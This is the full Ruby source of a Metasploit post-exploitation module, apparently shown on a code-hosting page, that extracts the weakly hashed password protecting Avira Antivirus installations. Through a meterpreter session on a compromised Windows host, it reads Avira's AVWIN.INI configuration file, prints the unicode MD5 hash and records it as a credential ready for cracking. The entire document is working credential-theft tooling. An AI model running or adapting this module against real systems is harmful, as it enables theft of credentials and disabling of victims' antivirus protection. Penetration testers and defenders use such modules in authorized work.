Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Registry
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Windows Gather Avira Password Extraction',
14
        'Description' => %q{
15
          This module extracts the weakly hashed password
16
          which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.
17
        },
18
        'License' => MSF_LICENSE,
19
        'Author' => [ 'Robert Kugler / robertchrk'],
20
        'Platform' => [ 'win' ],
21
        'SessionTypes' => [ 'meterpreter' ],
22
        'Compat' => {
23
          'Meterpreter' => {
24
            'Commands' => %w[
25
              core_channel_eof
26
              core_channel_open
27
              core_channel_read
28
              core_channel_write
29
              stdapi_fs_stat
30
            ]
31
          }
32
        }
33
      )
34
    )
35
  end
36

37
  def run
38
    print_status('Checking default location...')
39
    check_programdata('C:\\ProgramData\\Avira\\Antivirus\\CONFIG\\AVWIN.INI')
40
  end
41

42
  def check_programdata(path)
43
    client.fs.file.stat(path)
44
    print_status("Found file at #{path}")
45
    get_ini(path)
46
  rescue StandardError
47
    print_error("Error reading or processing #{path}.")
48
  end
49

50
  def get_ini(filename)
51
    config = client.fs.file.new(filename, 'r')
52
    parse = Rex::Text.to_ascii(config.read)
53
    ini = Rex::Parser::Ini.from_s(parse)
54

55
    if ini == {}
56
      print_error('Unable to parse file')
57
      return
58
    end
59

60
    print_status('Processing configuration file...')
61
    passwd = ini['COMMON']['Password']
62
    passwd = passwd.delete '"'
63
    create_credential({
64
      workspace_id: myworkspace_id,
65
      origin_type: :session,
66
      session_id: session_db_id,
67
      post_reference_name: refname,
68
      private_type: :nonreplayable_hash,
69
      jtr_format: 'Raw-MD5u', # hard coded since hash identifier wont know its unicode
70
      private_data: passwd,
71
      service_name: 'Avira Antivirus',
72
      status: Metasploit::Model::Login::Status::UNTRIED
73
    })
74
    print_good("MD5(Unicode) hash found: #{passwd}")
75
    print_good('Info: Password length is limited to 20 characters.')
76
  end
77
end
78

79